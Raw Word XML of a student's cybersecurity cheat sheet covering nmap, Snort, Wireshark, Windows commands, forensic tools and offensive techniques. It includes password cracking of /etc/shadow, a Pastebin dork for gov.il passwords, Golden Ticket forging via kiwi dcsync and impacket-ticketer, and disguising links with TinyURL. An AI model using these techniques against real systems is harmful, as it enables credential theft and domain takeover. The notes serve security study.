    <w:p w14:paraId="7AB8D174" w14:textId="0E698B10" w:rsidR="003D0295" w:rsidRDefault="003E0EA2" w:rsidP="00132564">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 -p 80 -sS -Pn -n –disable-arp-ping –packet-trace -D RND: 5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S send syn packet without completing the 3-way handshak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 skip the host resolution which make the scanning fast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E0E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ble-arp-ping</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disable arp ping discovery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E0E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et-trac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s all the packets sent and receive during the scanning</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E0E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RND:5</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ing 5 decoys of ip for harden on the target to scan the real ip scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C2DB64" w14:textId="4B6B9ED3" w:rsidR="00021236" w:rsidRDefault="0062373E" w:rsidP="003E0EA2">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 – udp scan</w:t>
      </w:r>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3 – between 0-5 speed of scanning, when 5 you may lose packets and you are not stealth, and T0 is slow and more stealth.</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G – output greppable</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N – output normal</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X – output XML (the only output provide the most info)</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373A"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373A" w:rsidRP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w:t>
      </w:r>
      <w:r w:rsidR="008E373A" w:rsidRP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G output-file.txt</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ave in greppable format to text file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0ACCFB" w14:textId="01C2EE41" w:rsidR="00021236" w:rsidRDefault="006B420E" w:rsidP="008E373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scan the ports by its order and not random</w:t>
      </w:r>
      <w:r w:rsidR="0036430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 – find os</w:t>
      </w:r>
      <w:r w:rsidR="00407D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 – specify non standard port</w:t>
      </w:r>
      <w:r w:rsidR="00407D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 – for file of</w:t>
      </w:r>
      <w:r w:rsidR="0005505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 of</w:t>
      </w:r>
      <w:r w:rsidR="00407D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p to attack</w:t>
      </w:r>
      <w:r w:rsidR="00A01C6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 – specify to stop attack after found right credentials</w:t>
      </w:r>
      <w:r w:rsidR="00A01C6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 4 – specify the amount of attacks parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099DC988" w14:textId="06D25D07" w:rsidR="00D8498F" w:rsidRPr="00D8498F" w:rsidRDefault="00D8498F" w:rsidP="00D8498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imeout 30 nmap "$ip" -sV -F | grep open | awk '{for (i=4; i&lt;=NF; i++) printf "%s ", $i; print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imit the scan for 30 seconds, show only from column 4 to the last column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35501F3E" w14:textId="20E73325" w:rsidR="00D8498F" w:rsidRDefault="00D8498F" w:rsidP="0062346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98F">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8498F">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8498F">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out 30 masscan "$ip" -p U:1-100</w:t>
      </w:r>
      <w:r w:rsidR="00B102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imit the time of the scan to 30 seconds, and scan all the port between 1-100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA273F5" w14:textId="77777777" w:rsidR="00D8498F" w:rsidRDefault="00D8498F" w:rsidP="008E373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E678E" w14:textId="77777777" w:rsidR="00E204D2" w:rsidRDefault="00E204D2" w:rsidP="008E373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E944FA" w14:textId="7DD1C3D6" w:rsidR="00723AB1" w:rsidRPr="000C387E" w:rsidRDefault="00723AB1" w:rsidP="00723AB1">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nch</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51E60F64" w14:textId="725B8A7A" w:rsidR="00723AB1" w:rsidRDefault="00723AB1" w:rsidP="008E373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nch 4 7 1234hd &gt;&gt; file.txt – minimum 4 chars, maximum 7 chars, the possible chars are 1234hd, save all the options of passwords to file.tx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eplace small letter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eplace big letter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eplace number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eplace symbols</w:t>
      </w:r>
      <w:r w:rsidR="000164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runch 7 7 -t lior^^^ &gt;&gt; symbol.txt – the flag -t has to come when using char that replace group of characters as ^, the file will contain lior (constant) word then more 3 symbols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E52C8E3" w14:textId="77777777" w:rsidR="00EF4C60" w:rsidRDefault="00EF4C60"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FB1D9" w14:textId="77777777" w:rsidR="0044046E" w:rsidRDefault="0044046E"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D9E26A" w14:textId="481114FA" w:rsidR="0044046E" w:rsidRPr="000C387E" w:rsidRDefault="0044046E" w:rsidP="0044046E">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The Ripper</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7213275C" w14:textId="22B6156D" w:rsidR="0044046E" w:rsidRDefault="0044046E"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john /etc/shadow – try to crack the /etc/shadow file while using it default list of passwords called password.lst, it will success only if the word very comm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etc/shadow --wordlist = ./new_list.txt – use the list of passwords to crack the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do /etc/shadow --wordlist = ./new_list.txt --format  </w:t>
      </w:r>
      <w:r w:rsidR="00FC205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ypt – use the list of passwords to crack the file and use the format we wrote</w:t>
      </w:r>
      <w:r w:rsidR="00FC205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etc/shadow --format  = crypt --show – it will show the password we already cracked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B283D60" w14:textId="77777777" w:rsidR="009F3651" w:rsidRDefault="00FC205C"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r2john crackme.rar &gt;&gt; hash.txt – save the hash of the password of the file, the same for files like zip2john, pdf2john, 7z2john, then all left is to crack it with john or other tools.</w:t>
      </w:r>
      <w:r w:rsidR="00AD3C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itlocker2john -i locked.vmdk &gt; hash.txt - extract hash of password of memory file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404CD9F9" w14:textId="77777777" w:rsidR="009F3651" w:rsidRDefault="009F3651"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0E090" w14:textId="77777777" w:rsidR="009F3651" w:rsidRDefault="009F3651"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CF8B1C" w14:textId="77777777" w:rsidR="009F3651" w:rsidRDefault="009F3651"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7A026F" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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EABAD1" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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65640" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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97D62E" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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1E4EBB" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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7F139" w14:textId="77777777" w:rsidR="009F3651" w:rsidRDefault="009F3651"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D8433" w14:textId="28DCC5D9" w:rsidR="009F3651" w:rsidRPr="000C387E" w:rsidRDefault="009F3651" w:rsidP="009F3651">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nort</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48C5645A" w14:textId="5AF120DF" w:rsidR="009F3651" w:rsidRDefault="009F3651"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S/IPS snort – it’s a tool for creating rules to pop up an alert when something </w:t>
      </w:r>
      <w:r w:rsidRPr="009F36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ppens</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1B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part of cisco, it</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ins many types of fields as:</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sg – the message will pop up</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id – snort ID, the id of the rule</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ffset – from each byte start to check</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epth –  how many bytes to investigate</w:t>
      </w:r>
      <w:r w:rsidR="00AA413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ntent – which string to search</w:t>
      </w:r>
      <w:r w:rsidR="00AA413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v – which version of the rule (we need to change manually the number when we change the rule so we could track on it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AC5523" w14:textId="77777777" w:rsidR="00110024" w:rsidRDefault="00EA275D"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ert ICMP 10.10.10.10 any -&gt; any any (msg: “ICMP attempt attack”; sid:1000005) – alert us if the ip 10.10.10.10 from any port exist will talk to any ip in every port in icmp message, </w:t>
      </w:r>
      <w:r w:rsidR="001100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ill pop the message “ICMP attempt attack”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6782CE49" w14:textId="3EF7FBB3" w:rsidR="00EF4C60" w:rsidRPr="009C77E4" w:rsidRDefault="00110024" w:rsidP="009C77E4">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 TCP 10.10.10.10/24 any -&gt; any any (content:”HTTP”; offset:4; depth:40; msg:”HTTP matched”;) – if there is tcp communication between every ip in10.10.10.10/24 in every port to any ip in any port, it will check between 5-44 bytes and search for HTTP string, if found I will pop the message  “HTTP matched”</w:t>
      </w:r>
      <w:r w:rsidR="009F36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FC205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BF3FF4F" w14:textId="77777777" w:rsidR="00EF4C60" w:rsidRDefault="00EF4C60"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EA8515" w14:textId="77777777" w:rsidR="00883A17" w:rsidRPr="00294C81" w:rsidRDefault="00883A17" w:rsidP="00883A17">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 commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEA14B4" w14:textId="436F8278" w:rsidR="008C066C" w:rsidRDefault="00480370" w:rsidP="0048037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g 8.8.8.8 – check the connection (may not respond even where there is a connection if the destination block the ICMP protoco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ing -a 8.8.8.8 – check the connection and resolve to host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83A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list – shows processes that running on the machin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C066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kill /? – shows all the options of taskkill command, like -h in linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BD2D0C" w14:textId="77777777" w:rsidR="00883A17" w:rsidRDefault="00883A17" w:rsidP="00883A1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s – clear the cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF66F90" w14:textId="0589AED8" w:rsidR="003000B5" w:rsidRDefault="00883A17" w:rsidP="00E42462">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user – shows a list of users</w:t>
      </w:r>
      <w:r w:rsidR="00C567D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 user administrator – show info the user administrator as local group and last logon and more</w:t>
      </w:r>
      <w:r w:rsid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000B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user soc 123 /add – add new user called soc with the password 123</w:t>
      </w:r>
      <w:r w:rsid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42462" w:rsidRP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user CyberJunkie /delete</w:t>
      </w:r>
      <w:r w:rsid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lete the user</w:t>
      </w:r>
      <w:r w:rsidR="00425D1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25D14" w:rsidRPr="00425D1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 user </w:t>
      </w:r>
      <w:r w:rsidR="00425D14" w:rsidRP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berJunkie </w:t>
      </w:r>
      <w:r w:rsidR="00425D1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4 -change password of user</w:t>
      </w:r>
      <w:r w:rsid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255CC" w:rsidRP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 user </w:t>
      </w:r>
      <w:r w:rsidR="007255CC" w:rsidRP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berJunkie </w:t>
      </w:r>
      <w:r w:rsidR="007255CC" w:rsidRP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yes</w:t>
      </w:r>
      <w:r w:rsid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nable user</w:t>
      </w:r>
      <w:r w:rsid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255CC" w:rsidRP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 user </w:t>
      </w:r>
      <w:r w:rsidR="007255CC" w:rsidRP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berJunkie </w:t>
      </w:r>
      <w:r w:rsidR="007255CC" w:rsidRP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no</w:t>
      </w:r>
      <w:r w:rsid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isable user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14186B5D" w14:textId="77777777" w:rsidR="00E96AF9" w:rsidRDefault="00E96AF9"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str – search for a word like grep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6AC6B5" w14:textId="77777777" w:rsidR="00E96AF9" w:rsidRDefault="00E96AF9"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 print the current time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCD5EF8" w14:textId="31C19A23" w:rsidR="00E96AF9" w:rsidRDefault="00E96AF9"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config – display network config</w:t>
      </w:r>
      <w:r w:rsidR="00BC0DD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con</w:t>
      </w:r>
      <w:r w:rsidR="00F3563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C0DD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w:t>
      </w:r>
      <w:r w:rsidR="00F3563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DD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dns – show all the dns resolver cache, all the ip addresses the dns resolved and saved it for better search in the next time</w:t>
      </w:r>
      <w:r w:rsidR="006F50F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config /release – return you ip address (you will lost connection)</w:t>
      </w:r>
      <w:r w:rsidR="006F50F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F50F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pconfig /renew </w:t>
      </w:r>
      <w:r w:rsidR="006D297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F50F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297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for new ip address</w:t>
      </w:r>
      <w:r w:rsidR="006D297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racert 8.8.8.8 – show all the path in the way to get to this ip address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE23C0B" w14:textId="2E2638E1" w:rsidR="003000B5" w:rsidRDefault="00E96AF9" w:rsidP="003000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 show current path, like pw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d .. – go back one directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B61E0" w14:textId="68592A7D" w:rsidR="003715FF" w:rsidRDefault="00E96AF9"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 – show</w:t>
      </w:r>
      <w:r w:rsidR="003715F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s and directories, like ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA4120C" w14:textId="77777777" w:rsidR="0043317B" w:rsidRDefault="003715FF" w:rsidP="003715F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 enter a file, like cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EF829B" w14:textId="75AF6B1D" w:rsidR="00804B18" w:rsidRDefault="00804B18" w:rsidP="00804B1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stat -ano – known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tat -a – know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04B1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ption tells netstat to display all connections and listening ports. It includes both TCP and UDP ports, regardless of their stat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04B1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option instructs netstat to display addresses and port numbers in numerical form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default, netstat attempts to determine and display th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of the remote addres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04B1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ption adds the Process ID (PID) associated with each connection to the output. This is crucial for identifying which processes on your system are creating which connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C950AD" w14:textId="59672F0E" w:rsidR="00CC4C4B" w:rsidRDefault="00CC4C4B" w:rsidP="00804B1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list – shows all the tasks/processes and their PI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askkill /PID 5072 – stop the process PID 5072</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2601B16A" w14:textId="77777777" w:rsidR="00C4612C" w:rsidRDefault="00FF725F"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b pic.jpg+sec.zip pic1.jpg – hide the file using A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ir /r – for see files that hidden in A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otepad vac7.jpg:secret.txt – open the text hidden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mspaint vac7.jpg:pic.jpg – open the </w:t>
      </w:r>
      <w:r w:rsidR="00A37D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 hidden file</w:t>
      </w:r>
      <w:r w:rsidR="00A37D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refox.ink F:\ADS\vac7.jpg:bomb.pdf – open the pdf hidden file</w:t>
      </w:r>
      <w:r w:rsidR="008A77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ype vac2.jpeg &gt; vac1.jpeg:vac2.jpeg – hide the file vac2.jpeg behind vac1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F849334" w14:textId="77777777" w:rsidR="000E1FB5" w:rsidRDefault="00C4612C"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tdump.exe $MFT /o mf.txt – convert the $MFT to text file (need the mftdump.exe file for that) than you can drag the text file to the excel and see the data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6363FF3A" w14:textId="7FB52F69" w:rsidR="00296C76" w:rsidRDefault="00883A17"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E27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3D753D3" w14:textId="77777777" w:rsidR="00873EBB" w:rsidRDefault="00873EBB"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33307" w14:textId="77777777" w:rsidR="00873EBB" w:rsidRDefault="00873EBB"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0B7AD9" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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1575C" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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394D1" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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8BFAB" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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ADF61" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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B0B36D" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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D9BE9" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4"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44ACA" w14:textId="77777777" w:rsidR="005E279D" w:rsidRDefault="005E279D"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4C1B16" w14:textId="4FEC0C90" w:rsidR="00C97ECA" w:rsidRPr="00C97ECA" w:rsidRDefault="00C97ECA" w:rsidP="00C97ECA">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ireshark filter syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8C4D3A" w14:textId="7389AB10" w:rsidR="002D2B47" w:rsidRDefault="005E279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src == 10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidR="00D27AC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dst == 10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidR="009E3A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addr == 10.10.10.10 – search for packets with this ip address in source or destina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th.src == (MAC address)</w:t>
      </w:r>
      <w:r w:rsidR="00E908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packets with this source MAC address</w:t>
      </w:r>
      <w:r w:rsidR="00E908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th.dst == (MAC address) – search packets with this destination MAC address</w:t>
      </w:r>
      <w:r w:rsidR="006628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th.addr == 08:8A… - search for packets that with this MAC address in source or destination</w:t>
      </w:r>
      <w:r w:rsidR="00E908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ns.qry.name == “xxx.com” – search for domain name</w:t>
      </w:r>
      <w:r w:rsidR="00E908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D7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p.port == 5355 – scan for specific udp port</w:t>
      </w:r>
      <w:r w:rsidR="008A577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cp.port == 445 – scan for specific tcp port</w:t>
      </w:r>
      <w:r w:rsidR="006D7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version == 4 – search for only ipv4 packets</w:t>
      </w:r>
      <w:r w:rsidR="0037181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version == 6 – search for only ipv6 packets</w:t>
      </w:r>
      <w:r w:rsidR="002D2B4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rame contains “login” – search for packets that contain the wor</w:t>
      </w:r>
      <w:r w:rsidR="00B75E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D2B4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r w:rsidR="00B75E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ttp.request.method == “GET” &amp;&amp; ip.src == 10.10.10.10 – filter for all the packets with get that specific ip shows there</w:t>
      </w:r>
      <w:r w:rsidR="000C1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ttp.request.uri contains “.gif” – search for specific word inside http protocol</w:t>
      </w:r>
      <w:r w:rsidR="000C1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cp.flag.syn == 1 &amp;&amp; tcp.flag.ack == 0 – shows all the packets that syn is defined but ack does not, which happen when someone scanning ports</w:t>
      </w:r>
      <w:r w:rsidR="00CD1EA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ot arp – </w:t>
      </w:r>
      <w:r w:rsidR="00F837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de</w:t>
      </w:r>
      <w:r w:rsidR="00CD1EA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37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p packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F00461"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88989"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46500"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49B186"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262D5"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2EC042"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F74C57"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FAB866"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EA1A1C"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9CFAD"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F21F5"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EE357"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61C594"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064A14"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180BB"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09916"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A714E"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C23E8" w14:textId="13C3E844" w:rsidR="00847C8A" w:rsidRPr="00C97ECA" w:rsidRDefault="00847C8A" w:rsidP="00847C8A">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shark syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F7DDB" w14:textId="440141B0" w:rsidR="00847C8A" w:rsidRDefault="00660D7F"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hark – a CLI for wireshark, you can use it for make automations or search for thing more easily.</w:t>
      </w:r>
      <w:r w:rsidR="007710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hen hardening to find the right filter, you can use wireshark and choose the wanted field, choose “use as filter” and you will see the syntax, th</w:t>
      </w:r>
      <w:r w:rsidR="00ED035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you can write this filter in -Y flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473CC2B4" w14:textId="2E12FF44" w:rsidR="00DE0241" w:rsidRDefault="00E957E7" w:rsidP="00DE024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hark -I eth0 – capture packets (you cant use in this terminal during this time)</w:t>
      </w:r>
      <w:r w:rsidR="00C626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shark -I eth0 -w class.pcap – show the amount of packets it captured and write it to this file</w:t>
      </w:r>
      <w:r w:rsidR="00C626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 – flag for sniff packets</w:t>
      </w:r>
      <w:r w:rsidR="00C626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 – flag for use exist file of packets</w:t>
      </w:r>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display-filter - -Y is a shorthand of --display-filter, it filter as the syntax of wireshark filter</w:t>
      </w:r>
      <w:r w:rsidR="005675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 – flag for get certain field inside the packets</w:t>
      </w:r>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z – flag for the statistics of wireshark</w:t>
      </w:r>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port-objects – flag for extract files</w:t>
      </w:r>
      <w:r w:rsidR="00CF6E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 fields – for specify </w:t>
      </w:r>
      <w:r w:rsidR="00115F4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ype of info</w:t>
      </w:r>
      <w:r w:rsidR="00115F4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 – for name the field, type -e for every field</w:t>
      </w:r>
      <w:r w:rsidR="00390A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 – shows the header of the framee</w:t>
      </w:r>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rk -r cap.pcap -Y  </w:t>
      </w:r>
      <w:r w:rsidR="00C626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src==10.10.10.10 &amp;&amp; http’ – the flag -r for open the file, and the flag -Y for filter to this source ip and http protocol</w:t>
      </w:r>
      <w:r w:rsidR="005675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5675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k -r cap.pcap -Y ‘http’ -T fields -e ‘ip.src’ – filter for http packets and get only their ip.src field</w:t>
      </w:r>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k -r cap.pcap –export-objects http,files_http – extract the files that received in http protocol and save them inside files_http directory</w:t>
      </w:r>
      <w:r w:rsidR="00C153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C153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k -r net.pcap -Y “frame.number==161” -T fields -e tcp.dstport -e udp.dstport – search for frame 161 and print the destination tcp and udp ports</w:t>
      </w:r>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shark -r net.pcap -z conv,ip – show the statistics of conversations, ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F89160" w14:textId="1C36DF15" w:rsidR="0080350A" w:rsidRDefault="00A27EB3" w:rsidP="00DE024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k -r net.pcap -T fields -e ‘eth.addr’ | sed ‘s/,/ /g’ | awk ‘{for(i=1; i&lt;=NF; i++) {print $i}}’ | sort | uniq | wc – shows all the eth.src and eth.dst in groups of eth.src,eth.dst, then the sed switch the , in space, and the awk make all the two columns to one column, and the sort uniq and wc count the uniqe ethernet addresses in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D46935" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRPr="009D0E12" w:rsidRDefault="009C77E4" w:rsidP="00DE024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090DAF" w14:textId="622ACA55" w:rsidR="0080350A" w:rsidRPr="00294C81" w:rsidRDefault="00294C81" w:rsidP="00294C81">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dorks syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B98E2A7" w14:textId="77777777" w:rsidR="00090CBC" w:rsidRDefault="0080350A" w:rsidP="00882BF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type: csv site: za budget – search for csv files from za area that has connection to the word “budget”, there is not : before the word “budget” so it make free search on i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ite: Pastebin.com intext </w:t>
      </w:r>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il passwords – search in the site Pastebin.com words in the conext of gov.il passwords.</w:t>
      </w:r>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url – search inside url</w:t>
      </w:r>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title – search inside title</w:t>
      </w:r>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letype – txt,csv, and more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D6ACC" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00882BF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3F6B0" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00882BF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008CC" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00882BF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FA36D1" w14:textId="77777777" w:rsidR="00DE253C" w:rsidRDefault="00DE253C" w:rsidP="00882BF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CD7AF" w14:textId="1FF4A8BE" w:rsidR="00DE253C" w:rsidRPr="00294C81" w:rsidRDefault="00DE253C" w:rsidP="00DE253C">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ating Golden Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18493C76" w14:textId="3DA7F201" w:rsidR="00A42FA5" w:rsidRDefault="00DE253C"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create golden ticket we need 3 </w:t>
      </w:r>
      <w:r w:rsidR="00A42FA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s:</w:t>
      </w:r>
      <w:r w:rsidR="00A42FA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1. Domain Name</w:t>
      </w:r>
      <w:r w:rsidR="00A42FA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2. SID</w:t>
      </w:r>
      <w:r w:rsidR="00A42FA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3. KRBTGT hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D349EB4" w14:textId="54F7F449" w:rsidR="00702525" w:rsidRDefault="00702525" w:rsidP="0070252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krbtgt account is a default service account in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crosoft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i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ctory used by the Kerberos Key Distribution Center (KDC) service. This account's primary function is to sign and encrypt Ticket Granting Tickets (TGTs) used within the Kerberos authentication proces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564511" w14:textId="7CB14D9E" w:rsidR="00A42FA5" w:rsidRDefault="00A42FA5"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get domain name we can use nmap too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o get SID we we can use 2 ways, but we need session to the machine for tha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can run the command whoami /user and find the SI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r we can use meterpreter session to use kiwi commands, firstly we need to write “load kiwi” to load kiwi commands, then use “dcsync_ntlm krbtgt”</w:t>
      </w:r>
      <w:r w:rsid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e will find in the output the SID, also the third thing we looked for, the NTLM hash.</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n, by running the next command we can create the golden ticke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mpacket-ticketer -nthash</w:t>
      </w:r>
      <w:r w:rsidR="00FA63E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omain-sid </w:t>
      </w:r>
      <w:r w:rsidR="003D50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1…. -domain … hack3r -dc-ip 10.10.10.10 – we need the insert the nthash we found, the SID we found, the name of the domain, the user</w:t>
      </w:r>
      <w:r w:rsid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ant to impersonate to (we can choose any exist user and we will prefer high privilege user as admin)</w:t>
      </w:r>
      <w:r w:rsidR="003D50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he ip of the DC</w:t>
      </w:r>
      <w:r w:rsid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07DB14"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3BF58"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2B394"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1E4B6"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35F400"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E72C7"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AA8CD"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E2590D"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85D90C"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F66EA8"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A886E"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21045D"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B5943"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8169F"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143868" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRPr="00A42FA5"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77D33A" w14:textId="3ACF1CCA" w:rsidR="00585246" w:rsidRDefault="00772D97" w:rsidP="00601DF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EEF14B0" w14:textId="2B1569E5" w:rsidR="00585246" w:rsidRPr="00294C81" w:rsidRDefault="00585246" w:rsidP="00585246">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ols  information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54598F28" w14:textId="77777777" w:rsidR="00585246" w:rsidRDefault="00585246"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Forensics – common tool to investigate files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD5DBC8" w14:textId="77777777" w:rsidR="00585246" w:rsidRDefault="00585246"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miner – good tool for investigate pcap file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495D50DC" w14:textId="77777777" w:rsidR="00585246" w:rsidRDefault="00585246"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K imager – you can load to this tool file or vmdk files and investigate them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB03C9E" w14:textId="2467BD1F" w:rsidR="00585246" w:rsidRDefault="00585246"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xD - You can load files to this tool and investigate fil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trl + G/F – for search inside the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ou can use the tool for change headers/trailers then open file you could not before, sometimes you need to change the extension of the file in the name accordingly, windows know hot to find a file by the extension name in the contrary of linux.</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t possible to use the tool for search files inside the original file, as pdf files and more, find the blocks of header and trailer, copy all the blocks between them to new file and call this file with the appropriate extension then you could open the “hidden” file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019617A3" w14:textId="754ED532" w:rsidR="00D360F5" w:rsidRDefault="00585246" w:rsidP="00D360F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t </w:t>
      </w:r>
      <w:r w:rsidR="00D360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er – you can see all kind of activities that happen on the machine, we use that for watch on anomaly in the network</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curity field</w:t>
      </w:r>
      <w:r w:rsidR="00D360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most used, an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ble use to see security stuff as log of users, when user fail to log, add user to domain, and more.</w:t>
      </w:r>
      <w:r w:rsidR="008935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use ctrl + f to search for strings (search even inside the events)</w:t>
      </w:r>
      <w:r w:rsidR="008935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also filter option of the tool to search for certain id event and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A34AF3A" w14:textId="77777777" w:rsidR="002D17B5" w:rsidRDefault="00D360F5" w:rsidP="00D360F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Security Policy – the place we define which kind of actions will appear in event viewer, we want the less we can for there will not be too much noise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7459B7" w14:textId="77777777" w:rsidR="002D17B5" w:rsidRDefault="002D17B5" w:rsidP="00D360F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View – a tool that help us to find if a file packed or encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDAF696" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="002D17B5"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mon – process monitor, show us software that running on the machine, and resources the software uses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F15EDE4"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C6DCD"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13A13"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194F50"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203CB"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970B1A"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09DF02"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07194C"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D9925"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C88EB"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7542C1"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D15B71" w14:textId="2F7D6415" w:rsidR="006D0E34" w:rsidRDefault="00772D97"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1A05E09" w14:textId="30083C46" w:rsidR="002D166C" w:rsidRPr="00294C81" w:rsidRDefault="006D0E34" w:rsidP="002D166C">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tra information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A4B571" w14:textId="09806901" w:rsidR="00AD5A99" w:rsidRDefault="00806014" w:rsidP="0043077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AD5A9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 user</w:t>
      </w:r>
      <w:r w:rsidR="00AD5A9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oot user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE4211B" w14:textId="3FCF809E" w:rsidR="0043077E" w:rsidRDefault="0043077E" w:rsidP="0043077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mp – stores temporary fil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ome – where all the home directories of all the users are foun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ar – variable data files such log files and mor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tc – local system configuration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oot – files required to boot linux</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in – contains a lot of commands as ls, rm and more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F00AD" w14:textId="161C0A13" w:rsidR="005033DB" w:rsidRDefault="005033DB" w:rsidP="0043077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Authority/system – the strongest user in windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCF1014" w14:textId="59C4EEF8" w:rsidR="00AD5A99" w:rsidRDefault="00D232DD"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6749F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ustotal – you can load file or url and it checks it hash to check if the file found problematic in the pas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ny.run – you can scan virus through this site but oppose to virustotal, this site is not save what you upload in its DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBBB67F" w14:textId="77777777" w:rsidR="00AD5A99" w:rsidRDefault="006749F7"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chef – site that helps in convertions of bases like from hex to binary, from base 64, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A8226A" w14:textId="77777777" w:rsidR="00AD5A99" w:rsidRDefault="006749F7"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ckstation – site for crack passwords, solve hashes a lot the john does not succeeds (on its default file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49381950" w14:textId="77777777" w:rsidR="0088672A" w:rsidRDefault="00772D97"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dan – site for passive scans, its has its own syntax, os: or org: and hostname: and mor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obots.txt – prevents index of google.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE18DDF" w14:textId="77777777" w:rsidR="003A3976" w:rsidRDefault="0088672A"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pp -I – tool that ask questions as the name of the dog and more for creates possible passwords, for install in you need to write “cupp” and enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2282A361" w14:textId="206C9C13" w:rsidR="001C0EBD" w:rsidRDefault="001C0EBD"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FatRat – tool for creating payloads, it also cooperate with msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB0F085" w14:textId="46CF7A92" w:rsidR="000E13AB" w:rsidRDefault="000E13AB"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berute – tool for exploit the Kerberos protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4334E083" w14:textId="5BF3F7A2" w:rsidR="00D80B1B" w:rsidRDefault="00D80B1B"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ry Kessler – site that shows headers and trailers by type of files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A18A9D1" w14:textId="7C448467" w:rsidR="00585246" w:rsidRDefault="00655DAB"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minutes mail – site that give you mail to use for 10 minutes, if you want to enter a site without to sign</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32914926" w14:textId="1AE4E311" w:rsidR="00540DD2" w:rsidRDefault="00540DD2"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yURL – site that get as input URL and output tiny URL, reduce the size of URL and enable us to make URL less suspicious</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B54D2B8" w14:textId="65023E98" w:rsidR="00B4458F" w:rsidRDefault="00B4458F"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io – a site that can host out file for temporary time (could use for transfer files between two machines)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6298815D" w14:textId="6C20219C" w:rsidR="00A30CDC" w:rsidRDefault="00A30CDC"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util – tool that convert exe to bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB83F21" w14:textId="5EF8B1EC" w:rsidR="00A25F69" w:rsidRDefault="00A25F69"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lassdoor – anonymous criticism on hitech companies </w:t>
      </w:r>
